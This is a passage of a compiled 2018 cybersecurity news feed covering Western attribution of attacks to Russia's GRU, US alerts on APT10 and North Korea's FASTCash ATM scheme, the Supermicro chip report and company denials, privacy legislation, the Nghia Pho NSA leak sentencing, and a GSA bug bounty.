“Cyberspace is not the Wild West. The International Community – including Russia – has agreed that international law and norms of responsible state behaviour apply in cyberspace. By embarking on a pattern of malicious cyber behaviour, Russia has shown a total disregard for the agreements it helped to negotiate,” reads a statement from Australia’s prime minister and minister of foreign affairs.

Australia says there must be consequences for these types of actions and public attribution is only the first step.

“It is unprecedented that the government should so overtly point the finger directly at the GRU. They must be very confident of their facts, either due to some sort of technical ‘fingerprint’ in the attack vectors themselves, or perhaps through corroboration from various other intelligence sources,” Malcolm Taylor, Director Cyber Advisory at ITC Secure and a former senior British intelligence officer, told SecurityWeek.

“But I think it’s also important to consider who benefits from attacks against these specific targets - WADA, Ukraine and the West in general. The answer to that question of course includes, and may indeed be limited to, Russia and Russian foreign policy interests. The mention of western businesses as targets should also be a reminder that foreign intelligence services do engage in commercial cyber espionage and we all need to take appropriate steps to manage that risk,” Taylor added.

U.S. Charges 7 Russian Intel Officers as West Condemns GRU
5.10.2018 securityweek

The U.S. Justice Department on Thursday charged seven Russian intelligence officers with hacking anti-doping agencies and other organizations hours after Western officials leveled new accusations against Moscow's secretive GRU military spy agency.

Hours before the U.S. indictment was announced, Western nations accused the GRU of new cybercrimes, with Dutch and British officials labeling the intelligence agency "brazen" for allegedly targeting the international chemical weapons watchdog and the investigation into the 2014 downing of a Malaysian Airlines flight over eastern Ukraine.

The U.S. indictment said that the GRU targeted its victims because they had publicly supported a ban on Russian athletes in international sports competitions and because they had condemned Russia's state-sponsored athlete doping program.

Prosecutors said that the Russians also targeted a Pennsylvania-based nuclear energy company and an international organization that was investigating chemical weapons in Syria and the poisoning of a former GRU officer.

The indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks

The GRU's alleged hacking attempts on the Organization for the Prohibition of Chemical Weapons took place in April and were disrupted by authorities, Dutch Defense Minister Ank Bijleveld said. Four Russian intelligence officers were immediately expelled from the Netherlands, she said.

Speaking about Russia's hacking attempts into the MH17 crash investigation, she said: "We have been aware of the interest of Russian intelligence services in this investigation and have taken appropriate measures."

The cascade of condemnation — from the Australian, British and Dutch governments — does more than just point the finger at Moscow. It also ties together a series of norm-shattering spy operations that have straddled the physical world and the digital sphere.

The British ambassador to the Netherlands said that the men caught with spy gear outside The Hague-based OPCW, for example, were from the very same GRU section (Unit 26165) accused by American investigators of having broken into the Democratic National Committee's email and sowing havoc during the 2016 U.S. presidential election.

The OPCW, in turn, was investigating the poisoning of GRU defector Sergei Skripal in which the nerve agent Novichok was used, a bold operation that British authorities dissected in a minute-by-minute surveillance camera montage last month.

At the same time, Australian and British spies have now endorsed the American intelligence community's reported attribution of the catastrophic June 2017 cyberattack on Ukraine to the GRU. The malicious software outbreak briefly knocked out cash machines, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, dealt $10 billion worth of damage worldwide.

The hack and release of sports figures' medical data in 2016 and the downing of MH17 over eastern Ukraine in 2014 also allegedly carry the GRU's fingerprints. Dutch investigators said the snoopers nabbed outside the OPCW also appear to have logged into the Wi-Fi networks near the World Anti-Doping Agency and the Malaysian hotels where crash investigators had gathered.

Moscow has issued the latest in a series of denials, but the allegations leveled by Western intelligence agencies, supported by a wealth of surveillance footage and overwhelmingly confirmed by independent reporting, paint a picture of the GRU as an agency that routinely crosses red lines — and is increasingly being caught red-handed.

Moscow has denied the allegations, but Russia's interests were at stake in both cases: the OPCW was investigating reports that a Soviet-made nerve agent had been used against a Russian ex-spy in England, and Russia has been blamed by some for being involved in shooting down MH17.

The leaders of Britain and the Netherlands condemned the GRU for "reckless" activities and vowed to defend vital international agencies from Russian aggression.

"This attempt, to access the secure systems of an international organization working to rid the world of chemical weapons, demonstrates again the GRU's disregard for the global values and rules that keep us all safe," British Prime Minister Theresa May and Dutch counterpart Mark Rutte said in a joint statement.

The coordinated actions by both countries came hours before an expected U.S. indictment involving Russian attempts to hack into computer systems.

The Dutch and British blamed Russia's GRU for "brazen" activities across the globe and for trying to cover up Russia's alleged participation in the nerve agent poisoning in March of Skripal and his daughter, and the downing of MH17 over Ukraine that killing all 298 people on board during a period of intense fighting between Ukrainian government forces and pro-Russia rebels. Russia has consistently denied involvement in the events.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity. Britain blames the secretive military intelligence unit for the nerve agent attack in March on former Russian spy Skripal and his daughter, Yulia, in the English city of Salisbury.

He said Russia's actions against the Netherlands-based OPCW came as the agency was conducting an independent analysis of the nerve agent used against the Skripals. Britain says the nerve agent was Novichok, produced in the Soviet Union, a finding later confirmed by the chemical weapons watchdog.

Earlier, British Defense Secretary Gavin Williamson branded a series of global cyberattacks blamed on Russia as the reckless actions of a "pariah state," saying that the U.K. and its NATO allies would uncover such activities in the future.

"Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them," Williamson told reporters in Brussels at talks with U.S. Defense Secretary Jim Mattis and their NATO counterparts.

Britain's National Cyber Security Center said Thursday that four new attacks are associated with the GRU as well as earlier security hacks.

It cites attacks on the World Anti-Doping Agency, Ukrainian transport systems, the 2016 U.S. presidential race and others as very likely the work of the GRU.

"We are going to actually make it clear that where Russia acts, we are going to be exposing that action," Williamson said.

"This is not the actions of a great power. This is the actions of a pariah state, and we will continue working with allies to isolate them; make them understand they cannot continue to conduct themselves in such a way," he said.

Earlier, Australian Prime Minister Scott Morrison and Foreign Minister Marise Payne issued a joint statement that Australian intelligence agencies agreed that GRU "is responsible for this pattern of malicious cyber activity." They said Australia wasn't significantly impacted, but the cyberattacks caused economic damage and disrupted civilian infrastructure in other places.

DHS Warns of Attacks on Managed Service Providers
5.10.2018 securityweek

The United States Department of Homeland Security (DHS) this week issued an alert on ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).

The activity, DHS says, involves attempts to infiltrate the networks of global MSPs, which provide remote management of customer IT and end-user systems.

The use of MSP increases an organization’s virtual enterprise infrastructure footprint, but also creates a large attack surface for cyber criminals and nation-state actors, DHS’ United States Computer Emergency Readiness Team (US-CERT) points out.

The newly released alert, TA18-276B, is related to activity that DHS' National Cybersecurity and Communications Integration Center (NCCIC) warned about in April 2017.

The same activity was associated by security firms with a Chinese actor referred to as APT10, but which is also known as menuPass and Stone Panda. The group is believed to be state-sponsored.

Tracked since 2009, the group has historically targeted mainly Japanese entities. Last year, the group was observed targeting entities in at least fourteen countries, including the website of a prominent U.S. trade association.

The threat actor is known for the use of a broad range of malware families, including the PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler (aka TravNet), and ZeroT.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing,” DHS’ new alert reads.

DHS’ new technical alert also includes information on the protective measures organizations should take to mitigate the risks associated with their MSP, which could expose them to APT activity.

These include restricting access to networks and systems, using a dedicated Virtual Private Network (VPN) for MSP connection, using firewalls, implement best practices for password and permission management, and incorporate operational controls.

China Used Tiny Chips on US Computers to Steal Secrets: Report
5.10.2018 securityweek

Tiny chips inserted in US computer equipment manufactured in China were used as part of a vast effort by Beijing to steal US technology secrets, a published report said Thursday.

The Bloomberg News report said the chips, the size of a grain of rice, were used on equipment made for Amazon, which first alerted US authorities, and Apple, and possibly for other companies and government agencies.

Bloomberg said a three-year secret investigation, which remains open, enabled spies to create a "stealth doorway" into computer equipment, a hardware-based entry that would be more effective and harder to detect than a software hack.

Citing unnamed US officials, Bloomberg said a unit of the People's Liberation Army were involved the operation that placed the chips on equipment manufactured in China for US-based Super Micro Computer Inc.

Supermicro, according to Bloomberg, also manufactured equipment for Department of Defense data centers, the CIA's drone operations, and onboard networks of Navy warships.

The report said Amazon discovered the problem when it acquired software firm Elemental and began a security review of equipment made for Elemental by California-based Supermicro.

According to Bloomberg, the spy chips were designed for motherboards -- the nerve centers for computer equipment -- used in data centers operated by Apple, Amazon Web Services and others.

Apple said in a statement it "has never found malicious chips, 'hardware manipulations' or vulnerabilities purposely planted in any server."

A statement by Amazon to AFP said that "at no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in Supermicro motherboards in any Elemental or Amazon systems.‎"

Supermicro could not immediately be reached for comment, but Bloomberg said the firm denied any knowledge of the espionage or investigation.

US offers its cyber warfare defense capabilities to NATO
4.10.2018 securityaffairs

The United States will offer its offensive cyber capabilities to NATO to strengthen its defenses against threat actors like Russian ones.
The United States is expected to announce to provide cyber warfare capabilities to NATO to strengthen its defenses against threat actors like Russian ones.

The announcement is expected today at a meeting of defence ministers in Brussels, the decision follows the public commitment of Britain and Denmark in providing cyber resources to NATO.

According to NATO chief Jens Stoltenberg, cyber attacks against members of the alliance are increasing in frequency and complexity, for this reason, it is essential to approach them with joint effort and mutual collaboration.

Attackers are able to interfere with the political processes of the countries, it has already happened during the 2016 Presidential election, and threaten critical infrastructure worldwide.

[cyber attacks on NATO countries were becoming] “more frequent… more sophisticated… more coercive” [and any contribution of cyber capabilities was welcome.] said Stoltenberg.

“We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict,” Stoltenberg said.

The critical infrastructure of Lithuania, Latvia and Estonia are under incessant attacks that they attribute to Russia.

Russia-linked APR groups are blamed of interference in some European elections and 2018 US midterm election

The US intelligence accused the Kremlin of conducting a disinformation campaign in Macedonia through social media aimed at sabotage referendum on changing the country’s name that could open the door of the NATO alliance to the country.

California Law Sets Up Fresh Legal Clash Over 'Net Neutrality'
4.10.2018 securityweek

The US Justice Department's lawsuit to block a California law aimed at ensuring all online data to be treated equally sets up a legal clash over so-called "net neutrality" and the authority to regulate the internet.

California Governor Jerry Brown on Sunday signed the law that re-established net neutrality in his state, the country's largest and home to some of the largest online firms including Facebook and Google.

Within hours, the Trump administration sued to block the law, calling it an illegal infringement over federal authority.

"Under the constitution, states do not regulate interstate commerce -- the federal government does. Once again the California legislature has enacted an extreme and illegal state law attempting to frustrate federal policy," Attorney General Jeff Sessions said in a statement announcing the lawsuit.

The moves open up a new legal clash over net neutrality rules, which have been the subject of a contentious battle for over a decade.

Net neutrality backers argue that a law is needed to guard against that broadband providers like Verizon and AT&T favoring their own services and blocking or slowing rival services like Netflix.

"This law will prevent internet service providers from unduly influencing internet traffic, thereby allowing Californians to continue to decide what content they want and when they want it, and allowing the online market to continue to flourish," said Eric Null of the New America Foundation's Open Technology Institute.

But critics claim restrictions will chill investment needed to ensure that new high-speed networks are built and innovative services offered.

Federal Communications Commission chairman Ajit Pai countered that the California law "hurts consumers" and infringes on federal authority.

"The law prohibits many free-data plans, which allow consumers to stream video, music, and the like exempt from any data limits," Pai said.

"The internet is free and open today, and it will continue to be under the light-touch protections" of current federal rules.

Long, winding road

The FCC adopted net neutrality rules twice starting in 2009, in both cases struck down by the courts which said the agency had no authority to regulate internet firms. A third effort in 2015 withstood a court challenge when the FCC reclassified broadband firms as telecom providers.

But last year, under Trump appointee Pai, the FCC reversed course and repealed net neutrality rules, which prompted several states to began their own efforts.

Stanford University law professor Barbara van Schewick said she believes the California law will withstand the federal challenge and set a standard that will be followed in the US and around the world.

Van Schewick said in a blog post that while an FCC 2017 order explicitly bans states from adopting their own net neutrality laws, "that preemption is invalid."

"An agency that has no power to regulate has no power to preempt the states, according to case law," she said.

The law also marks the latest challenge between Brown's administration and President Donald Trump's Republicans, who have already clashed over environmental and immigration regulations.

USTelecom, which represents companies in the broadband sector, said it supports net neutrality but disagreed with the California law.

"Rather than 50 states stepping in with their own conflicting open internet solutions, we need Congress to step up with a national framework for the whole internet ecosystem and resolve this issue once and for all," the industry group said.

U.S. Links North Korean Government to ATM Hacks
4.10.2018 securityweek

U.S. Shares Details on North Korea’s ATM Cash-out Scheme

The United States Department of Homeland Security (DHS), Department of the Treasury (Treasury), and Federal Bureau of Investigation (FBI) this week released a joint technical alert to share information on an Automated Teller Machine (ATM) cash-out scheme attributed to the North Korean government.

The financially-motivated malicious campaign was attributed to the North Korea-linked threat actor the U.S. government refers to as Hidden Cobra, but which is better known in the infosec community as the Lazarus Group.

Considered the most serious threat to banks, the actor is believed to have orchestrated the $81 million heist from the Bangladesh bank. This year, the group was said to have been involved in numerous attacks against financial institutions and banks and to have also shown interest in crypto-currencies.

Last year, the U.S. started sharing details on the activity associated with Hidden Cobra, including information on the tools the actor employs in attacks, including malware such as Typeframe, Joanap and Brambul, Fallchil, and others. In September, U.S. authorities charged a North Korean national over his alleged involvement with Lazarus.

The most recent alert issued by the U.S. government on Hidden Cobra details FASTCash, a set of tactics the group has been using since at least 2016 to target banks in Africa and Asia and maintain presence on the victims’ networks for further exploitation.

As part of the FASTCash schemes, hackers remotely compromise payment switch application servers within banks to perform fraudulent transactions. The use of these tactics was highly successful and the group is expected to continue using them to target retail payment systems vulnerable to remote exploitation.

“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries,” the joint alert reads.

The actor allegedly configured and deployed legitimate scripts on compromised servers to intercept legitimate financial requests and reply to them with fraudulent responses. The group leveraged knowledge of the standard for financial transaction messaging and other tactics to exploit the targeted systems.

The deployed scripts apparently inspected inbound financial request messages for specific primary account numbers (PANs) and could generate fraudulent responses only for the requests that matched the expected PANs.

While the initial infection vector hasn’t been identified, Lazarus is known for the use of spear-phishing emails in targeted attacks against bank employees and might have employed Windows-based malware “to explore a bank’s network to identify the payment switch application server.” Lateral movement was likely performed leveraging legitimate credentials.

Alongside the joint alert, the DHS also published a malware analysis report (MAR-10201537) to provide details on the malware Hidden Cobra used as part of the FASTCash attacks. Of a total of 10 files submitted for analysis, four were found to be malicious, 2 were command-line utility applications, 3 were apps offering export functions and methods to interact with financial systems, and 1 was a log file.

The identified malicious programs include Trojans and various backdoors that could retrieve system information, find and manipulate files, execute and terminate processes, download and upload files, and execute commands. In addition to Windows, the Trojans targeted IBM’s Advanced Interactive Executive (AIX) platform, which was running on the compromised payment switch application servers.

The FASTCash scheme only appears to have targeted banks in Africa and Asia, with no incidents observed in the U.S.

U.S. Energy Department Invests Another $28 Million in Cybersecurity
2.10.2018 securityweek

The U.S. Department of Energy on Monday announced that it’s investing up to $28 million in tools and technologies that will improve the resilience and cybersecurity of the power grid and oil and gas infrastructure.

The funding comes from the Office of Cybersecurity, Energy Security, and Emergency Response (CESER), which the DOE launched in February, and it aims to support the strategy described in the agency’s recently unveiled multiyear cybersecurity plan.DOE investing $28 million in cybersecurity

The money will support research, development and demonstration (RD&D) of innovative tools and technologies designed for preventing, detecting and mitigating cyber threats.

“Protecting the Nation’s energy delivery systems from cyber-threats is a top national priority,” said U.S. Secretary of Energy Rick Perry. “These awards will spur the next level of innovation needed to advance cyber resilience, ensuring that the Nation’s critical energy infrastructure can withstand potential cyber attacks while also still keeping the lights on.”

There are a total of 11 projects focusing on creating a cyber-resilient architecture for the electric and oil and natural gas subsectors, cybersecurity for oil and natural gas environments, secure communications, secure cloud-based technologies for operation technology (OT) networks, and technologies for enhancing cybersecurity in the energy sector.

Universities, national laboratories, and private-sector companies have teamed up for each of the projects. Award recipients include ABB, Dragos, GE Global Research, Schweitzer Engineering Laboratories (SEL), TDi, the Texas A&M Engineering Experiment Station, the United Technologies Research Center, and WhiteScope.

DOE investing $28 million in cybersecurity

Industrial cybersecurity firm Dragos leads a project called The Neighborhood Keeper, which aims to develop a low-cost, cloud-based sensor network within OT networks to "enable integration of available technologies that will facilitate real-time and actionable information to reduce cyber risk.”

“Dragos is excited to be participating in a DOE program that helps expand accessibility to ICS cybersecurity,” Robert Lee, CEO of Dragos, said via email. “The secure, cost-effective architecture of Neighborhood Keeper is a service to the ICS community that will enable collaborative industrial control systems threat intelligence without the risk of sharing private information.”

This is not the first time the Energy Department announces significant investment in cybersecurity. Roughly one year ago it offered over $20 million for projects focusing on cybersecurity, and earlier this year it announced awards of up to $25 million for technologies designed to protect the country’s energy infrastructure against cyber threats.

EU Lawmakers Push for Cybersecurity, Data Audit of Facebook
28.9.2018 securityweek

BRUSSELS (AP) — European Union lawmakers appear set this month to demand audits of Facebook by Europe's cybersecurity agency and data protection authority in the wake of the Cambridge Analytica scandal.

A draft resolution submitted Thursday to the EU Parliament's civil liberties and justice committee urged Facebook to accept "a full and independent audit of its platform investigating data protection and security of personal data."

The assembly summoned Facebook CEO Mark Zuckerberg in May to testify about allegations that political consulting firm Cambridge Analytica used the data of millions of Facebook users to target voters during political campaigns, including the one that brought U.S. President Donald Trump to office.

Claude Moraes, the chairman of the EU parliamentary committee who drafted the resolution, said the probes "need to be done."

"Not only have Facebook's policies and actions potentially jeopardized citizens' personal data, but then they have also had an impact on electoral outcomes and on the trust citizens pose in digital solutions and platforms," Moraes said.

The committee aims to adopt the resolution, which will almost certainly be modified, by Oct. 10 and put it to the full assembly for endorsement in late October, well ahead of EU elections next May.

The resolution also urges European justice authorities to investigate any alleged "misuse of the online political space by foreign forces," and calls on the EU's executive Commission to propose ways to boost the powers of Europe's public prosecutor's office so it can tackle crimes against electoral infrastructure.

It notes "with regret" that Facebook did not send staff with the right technical knowledge to answer lawmakers' questions and "points out that such an approach is detrimental to the trust European citizens have in social platforms."

Zuckerberg was questioned in Brussels on May 22, but the lawmakers used up most of the speaking time with their own remarks, leaving the Facebook chief with little time to respond.

Senate Panel to Hear From Internet Execs on Privacy Policies
27.9.2018 securityweek

The Trump administration is hoping Congress can come up with a new set of national rules governing how companies can use consumers' data that finds a balance between "privacy and prosperity."

But it will be tricky to reconcile the concerns of privacy advocates who want people to have more control over the usage of their personal data — where they've been, what they view, who their friends are —and the powerful companies that mine it for profit.

Executives of a half-dozen U.S. internet titans are due to appear Wednesday before the Senate Commerce Committee to explain their privacy policies. Senior executives from AT&T, Amazon, Apple, Google, Twitter and Charter Communications are expected to testify at the hearing, amid increasing anxiety over safeguarding consumers' data online and recent scandals that have stoked outrage among users and politicians.

But the approach to privacy legislation being pondered by policymakers and pushed by the internet industry leans toward a relatively light government touch.

An early move in President Donald Trump's tenure set the tone on data privacy. He signed a bill into law in April 2017 that allows internet providers to sell information about their customers' browsing habits. The legislation scrapped Obama-era online privacy rules aimed at giving consumers more control over how broadband companies like AT&T, Comcast and Verizon share that information.

Allie Bohm, policy counsel at the consumer group Public Knowledge, says examples abound of companies not only using the data to market products but also to profile consumers and restrict who sees their offerings: African Americans not getting access to ads for housing, minorities and older people excluded from seeing job postings.

The companies "aren't going to tell that story" to the Senate panel, she said. "These companies make their money off consumer data."

What is needed, privacy advocates maintain, is legislation to govern the entire "life cycle" of consumers' data: how it's collected, used, kept, shared and sold.

Meanwhile, regulators elsewhere have started to act.

The 28-nation European Union put in strict new rules this spring that require companies to justify why they're collecting and using personal data gleaned from phones, apps and visited websites. Companies also must give EU users the ability to access and delete data, and to object to data use under one of the claimed reasons.

A similar law in California will compel companies to tell customers upon request what personal data they've collected, why it was collected and what types of third parties have received it. Companies will be able to offer discounts to customers who allow their data to be sold and to charge those who opt out a reasonable amount, based on how much the company makes selling the information.

The California law doesn't take effect until 2020 and applies only to California consumers, but it could have fallout effects on other states. And it's strong enough to have rattled Big Tech, which is seeking a federal data-privacy law that would be more lenient toward the industry.

"A national privacy framework should be consistent throughout all states, pre-empting state consumer-privacy and data security laws," the Internet Association said in a recent statement . The group represents about 40 big internet and tech companies, spanning Airbnb and Amazon to Zillow. "A strong national baseline creates clear rules for companies."

The Trump White House said this summer that the administration is working on it, meeting with companies and other interested parties. Thune's pronouncement and one from a White House official stress that a balance should be struck in any new legislation — between government supervision and technological advancement.

The goal is a policy "that is the appropriate balance between privacy and prosperity," White House spokeswoman Lindsay Walters said. "We look forward to working with Congress on a legislative solution."

Senate Committee Approves Several Cybersecurity Bills
27.9.2018 securityweek

The U.S. Senate Committee on Homeland Security and Governmental Affairs on Wednesday voted to approve several cybersecurity bills, including ones related to incident response, supply chain security, the government’s cyber workforce, and safeguarding federal information systems.

One of the bills, introduced recently by Senators Maggie Hassan and Rob Portman, is the DHS Cyber Incident Response Teams Act of 2018, which aims to strengthen cybersecurity by requiring the Department of Homeland Security (DHS) to create permanent incident response teams and what lawmakers call “cyber hunt” teams.

These teams would help prevent cyberattacks on both federal agencies and private sector companies, and help mitigate the impact of attacks. The legislation was proposed following reports that Russia-linked threat actors targeted electric utility and other critical infrastructure companies in the U.S.

A companion bill, introduced by Chairman of the House Committee on Homeland Security, Rep. Michael McCaul, recently passed the U.S. House of Representatives.

Another bill approved on Wednesday by the committee is the Federal Rotational Cyber Workforce Program Act of 2018, which Sen. Hassan also co-sponsored. The bill proposes a new program called the Federal Rotation Cyber Workforce Program (FRCWP) that will create policies and procedures for temporarily moving employees from one agency to another.

“Our country faces ever-evolving cyber threats from Russia, China, criminal hackers, and cyber terrorists every single day, and these bipartisan bills will help bolster cyber defenses at federal agencies in order to better protect Americans,” Sen. Hassan said. “While we have far more work to do, these bipartisan bills are important steps to strengthen our elite cyber defense teams, and I urge my colleagues across the aisle to bring these measures to the floor for a vote as quickly as possible.”

Another cybersecurity bill co-sponsored by Sen. Hassan is related to the federal supply chain. The Federal Acquisition Supply Chain Security Act of 2018 was introduced after the government banned cybersecurity products from Kaspersky Lab due to concerns over Russian spying.

The bill seeks the creation of a Federal Acquisition Security Council whose role will be to develop criteria and processes for assessing the supply chain risk posed to national security and the public interest by the acquisition of certain technologies.

The committee also passed the Federal Information Systems Safeguards Act of 2018, which allows federal agencies to make decisions related to securing IT and information systems. The bill allows the head of an agency to restrict or prohibit access to a website, and deploy or update cybersecurity measures.

Finally, the Senate Homeland Security and Governmental Affairs Committee voted to approve the Advancing Cybersecurity Diagnostics and Mitigation Act, which establishes a continuous diagnostics and mitigation program at the DHS.

Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak
27.9.2018 securityaffairs

Former NSA TAO hacker was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky.
A former member of the NSA’s Tailored Access Operations hacking team was sentenced to 66 months in prison because he leaked top-secret online documents related to the US government ban on Kaspersky software.

The former NSA hacker is Nghia Hoang Pho (68), he served the US intelligence for 10 years as a member of the NSA’s elite Tailored Access Operations hacking unit.

The man pleaded guilty in December 2017 to one count of willful retention of classified national defense information.

The Vietnam-born American citizen, who was living in Ellicott City, Maryland, was charged with illegally removing top secret materials.

The NSA hacker admitted taking home copies of classified NSA hacking tools and exploits with the knowledge that they were cyber weapons.

The tools were detected by the Kaspersky Lab software installed on the NSA hacker’s personal computer and were sent back to Kaspersky’s server for further analysis.

Kaspersky Lab, published a detailed report on how cyber spies could have easily stolen the software exploits from the NSA employee’s Windows PC.

According to the prosecutors, between 2010 and 2015, the former NSA hacker had taken home with him TAO materials, including exploits and hacking tools.

According to the telemetry logs collected by the Russian firm, the staffer temporary switched off the antivirus protection on the PC, and infected his personal computer with a spyware from a product key generator while trying to use a pirated copy of Office.

On September 11, 2014, Kaspersky antivirus detected the Win32.GrayFish.gen trojan on the former NSA TAO member’s PC, sometime later the employee disabled the Kaspersky software to execute the activation-key generator.

Then the antivirus was reactivated on October 4, it removed the backdoored key-gen tool from the NSA employee’s PC and uploaded it to Kaspersky’s cloud for further analysis.

Kaspersky published a second report that sheds the light on the investigation conducted by the firm on the NSA-linked Equation Group APT.

Kaspersky has begun running searches in its databases since June 2014, 6 months prior to the year the alleged hack of its antivirus, for all alerts triggered containing wildcards such as “HEUR:Trojan.Win32.Equestre.*”. The experts found a few test signatures in place that produced a LARGE number of false positives.

The analysis revealed the presence of a specific signature that fired a large number of times in a short time span on just one system, specifically the signature “HEUR:Trojan.Win32.Equestre.m” and a 7zip archive (referred below as “[undisclosed].7z”). This is the beginning of the analysis of the system that was found containing not only this archive but many files both common and unknown that indicated this was probably a person related to the malware development.

The analysis of the computer where the archive was found revealed that it was already infected with malware. In October of that year the user downloaded a pirated copy of the Microsoft Office 2013, but the .ISO was containing the Mokes backdoor.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two month its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

The security firm explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

NSA TAO hacker

According to the Wall Street Journal, the intrusion of the Pho’s computer led to the Russians obtaining information on how the NSA TAO using hack into foreign computer networks.

“As a result of his actions, Pho compromised some of our country’s most closely held types of intelligence, and forced NSA to abandon important initiatives to protect itself and its operational capabilities, at great economic and operational cost,” declared US Attorney Robert Hur.

The US Government banned using Kaspersky anti-virus software on government networks and blamed the company of working for the Russian intelligence.

Kaspersky has repeatedly denied any ties to the Russian intelligence and announced the launch of a transparency initiative that involves giving partners access to the source code of its solutions.

U.S. Unveils First Step Toward New Online Privacy Rules
26.9.2018 securityweek

The US administration called Tuesday for public comments on a "new approach to consumer data privacy" that could trigger fresh regulations of internet companies.

The Commerce Department said the announcement is part of an effort to "modernize US data privacy policy for the 21st century."

The move follows the implementation this year of ramped up data protection rules imposed by the European Union, and a new privacy law enacted in California.

Both measures will impact internet firms whose websites can be accessed around the globe.

Privacy and data protection have come into greater focus in response to these new laws, and also because of growing concerns on how private data is handled following revelations on the hijacking of millions of Facebook user profiles by a political consultancy ahead of the 2016 election.

"The United States has a long history of protecting individual privacy, but our challenges are growing as technology becomes more complex, interconnected and integrated into our daily lives," said David Redl, who heads the agency's National Telecommunications and Information Administration (NTIA).

"The Trump administration is beginning this conversation to solicit ideas on a path for adapting privacy to today's data-driven world."

The agency said it was also developing a voluntary privacy framework to help organizations manage risk and working on ways "to increase global regulatory harmony."

The Commerce Department statement said the agency is focused on "desired outcomes" for privacy rather that dictating specific practices.

But it plans to seek public comment on transparency practices -- how data is collected and used -- as well as security safeguards.

Users of online platforms "should be able to reasonably access and correct personal data they have provided," the statement added. "Organizations should take steps to manage the risk of disclosure or harmful uses of personal data."

Ex-NSA Hacker Sentenced to Jail Over Kaspersky Leak
26.9.2018 securityweek

A former National Security Agency hacker whose leak of extremely top secret online spying materials led to the US government ban on Kaspersky software was sentenced to 66 months in prison Tuesday.

Nghia Hoang Pho, 68, a 10-year veteran of the NSA's elite Tailored Access Operations hacking unit, pleaded guilty in December to one count of willful retention of classified national defense information.

Authorities discovered that between 2010 and 2015, he had taken home with him substantial TAO materials, including programs and data, that eventually ended up in the hands of Russian intelligence.

Vietnam-born Pho put the information on his home computer, which was protected by the popular Kaspersky anti-virus program. US authorities believe that Russian intelligence was able to access his computer through Kaspersky.

In order to function, the Kaspersky program needs a computer owner's blanket permission to access the machine's systems.

It then communicates the results of its anti-virus scans to Kaspersky headquarters -- in Moscow.

The Wall Street Journal reported last year that the 2015 penetration of Pho's computer led to the Russians obtaining information on how the NSA itself infiltrates foreign computer networks and protects itself from cyberattacks.

Kaspersky itself later confirmed the theft, saying what was stolen included essential source code for so-called Equation Group hacking software from the NSA.

The leak was one of the most devastating ever for the NSA, one of the US government's most important spy agencies, and significantly set back its operations against foreign targets' computers.

"As a result of his actions, Pho compromised some of our country's most closely held types of intelligence, and forced NSA to abandon important initiatives to protect itself and its operational capabilities, at great economic and operational cost," said US Attorney Robert Hur.

The incident was a key reason for the US government's ban on using Kaspersky anti-virus software on government computers, warning that the company has suspect links to Russian intelligence.

Kaspersky denies any ties to the Russian government or its spies.

U.S. General Service Administration Launches Bug Bounty Program

25.9.2018 securityweek  BigBrothers

The United States General Service Administration’s (GSA) Technology Transformation Service (TTS) has launched a bug bounty program on HackerOne, the hacker-powered security platform announced on Friday.

GSA, the first federal civilian agency to have launched a bug bounty program, is willing to pay up to $5,000 for Critical vulnerabilities found in its services. However, only some of the GSA’s TTS services are included in the multi-year HackerOne bug bounty program.

Last year GSA launched a bug bounty and vulnerability disclosure program (VDP) with HackerOne and paid between $300 and $5,000 for flaws reported in public-facing digital systems, including TTS assets such as login.gov, data.gov, cloud.gov and vote.gov.

HackerOne was awarded the new contract in September, following an open market bidding process. The period will extend for up to 5 years.

On HackerOne’s website, TTS reveals that the scope of the program includes services such as Federalist, data.gov, cloud.gov, and login.gov.

For vulnerabilities in the open source static site web publishing service Federalist, TTS is willing to pay between $250 and $5,000, depending on each flaw’s severity. Assets within scope include federalist.18f.gov, federalist-proxy.app.cloud.gov, federalist-docs.18f.gov, and open source resources (hosted on GitHub) 18F/federalist, 18F/federalist-builder, 18F/federalist-proxy, 18F/federalist-docker-build, and 18F/docker-ruby-ubuntu.

For Data.gov, rewards range between $150 and $2,000, and are awarded for vulnerabilities in www.data.gov, api.data.gov, federation.data.gov, sdg.data.gov, labs.data.gov, catalog.data.gov, inventory.data.gov, static.data.gov, admin-catalog-bsp.data.gov, and GSA/data.gov and GSA/datagov-deploy resources (also on GitHub).

The same bounty amounts are awarded for flaws in Cloud.gov assets, including cloud.gov, account.fr.cloud.gov, admin.fr.cloud.gov, alertmanager.fr.cloud.gov, api.fr.cloud.gov, ci.fr.cloud.gov, dashboard.fr.cloud.gov, diagrams.fr.cloud.gov, grafana.fr.cloud.gov, idp.fr.cloud.gov, login.fr.cloud.gov, logs.fr.cloud.gov, logs-platform.fr.cloud.gov, nessus.fr.cloud.gov, opslogin.fr.cloud.gov, prometheus.fr.cloud.gov, and ssh.fr.cloud.gov.

